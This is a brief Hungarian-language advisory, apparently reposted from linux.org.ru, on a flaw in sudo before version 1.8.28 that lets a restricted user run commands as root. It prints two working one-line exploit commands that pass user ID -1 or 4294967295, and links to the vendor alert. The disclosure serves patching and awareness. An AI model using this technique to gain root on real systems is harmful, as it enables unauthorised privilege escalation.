A sudo hibája lehetővé teszi, hogy bármilyen végrehajtható fájlt rootként hajtson végre, ha az /etc/sudoers lehetővé teszi, hogy más felhasználók is végrehajtsák, és a root számára tiltott.
A hiba kihasználása nagyon egyszerű:
sudo -u#-1 id -u
vagy:
sudo -u#4294967295 id -u
A hiba a sudo összes 1.8.28 előtti verziójában jelen van
Részletek:
https://thehackernews.com/2019/10/linux-sudo-run-as-root-flaw.html
https://www.sudo.ws/alerts/minus_1_uid.html
Forrás: linux.org.ru